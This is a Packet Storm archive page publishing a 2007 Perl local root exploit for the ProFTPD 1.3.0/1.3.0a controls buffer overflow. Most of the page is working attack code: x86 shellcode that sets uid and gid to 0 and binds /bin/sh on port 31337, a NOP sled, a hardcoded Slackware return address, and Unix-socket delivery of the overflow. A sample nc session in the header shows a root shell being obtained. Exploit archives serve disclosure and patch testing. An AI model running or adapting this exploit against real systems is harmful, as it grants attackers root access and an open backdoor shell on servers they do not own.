what you don't know can hurt you

revenge_proftpd_ctrls_24.pl.txt

revenge_proftpd_ctrls_24.pl.txt
Posted Feb 20, 2007
Authored by Alfredo Pesoli | Site 0xcafebabe.it

ProFTPD versions 1.3.0 and 1.3.0a controls local root exploit that binds a shell to tcp/31337.

tags | exploit, shell, local, root, tcp
MD5 | eb77e82d16ea45b10326b4894f6a9104

revenge_proftpd_ctrls_24.pl.txt

Change Mirror Download
#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
# [Old style school sploit against gcc 3.x and linux kernel 2.4]
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.4 exploitation against gcc 3.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a <bind_shell> as payload since a normal setuid + execve seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0a on Slackware 11.0 compiled with gcc 3.4.6
# *** Against v1.3.0a -- server *could* remain up (in a Denial of Service condition) without binding shell
#
# revenge@darklight~$ ./revenge_proftpd_ctrls_24.pl /usr/local/var/proftpd/proftpd.sock 1
# [ wait some secs then nc on port 31337 ]
# anyone@anywhere:~$ nc <host> 31337
# id
# uid=0(root) gid=0(root) groups=50(ftp)
# exit
# [ after that server will deactivate ]
#
# Alfredo "revenge" Pesoli
#
# http://www.0xcafebabe.it/
# <revenge@0xcafebabe.it>
#

use strict;
use Socket;

if ( @ARGV < 2 ) { &usage(); }

my $hellcode =
# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x31\xdb\xb0\x2e\xcd\x80".
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80".
"\x89\xc7\x31\xc9\x66\xb9\x7a\x69\x52\x66\x51\x43\x66\x53\x89\xe1".
"\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd".
"\x80\x31\xc0\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3".
"\x89\xd9\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\xeb\x18\x5e\x31\xc0\x88".
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d".
"\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

my $rsock = shift;
my $tn = shift;

my $ret;
my $nop = "\x90"x200;

use constant LSOCK => '/tmp/tmp.sock';

my %targets = (
'1' => "\x55\xef\xff\xbf" # Slackware 11.0
# Add here your target RET
);

my %tname = (
'1' => "Slackware 11.0"
);

$ret = $targets{$tn};

my $buffer = $nop.$hellcode.("$ret"x70);
my $l = length($buffer);

socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die "Unable to create socket : $!";
my $rfile = sockaddr_un($rsock);

unlink LSOCK;
my $lfile = sockaddr_un(LSOCK);

bind (SOCK, $lfile) or die "Unable to bind to $lfile";
chmod (00700, LSOCK);

connect (SOCK, $rfile) or die "\nUnable to connect to ".$rsock."\nMaybe server is down or incorrect path\n\n";

print "\n Request length => ".$l."\n";
print " Target => ".$tname{$tn}."\n";

send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buffer,0;

close SOCK;

print "\n [#] Request sent - try to connect on port 31337\n\n";

sub usage() {
print "\n ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow [ Old Style school ]\n";
print " Alfredo \"revenge\" Pesoli\n";
print " <revenge\@0xcafebabe.it>\n\n";
print "Usage : $0 <path_to_unix_socket> <targets>\n";
print " Ex : $0 /usr/local/var/proftpd/proftpd.sock 1\n";
print "\n Available Targets :\n";
print " 1 => 0xbfffef55 (Slackware 11.0)\n\n";
exit();
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close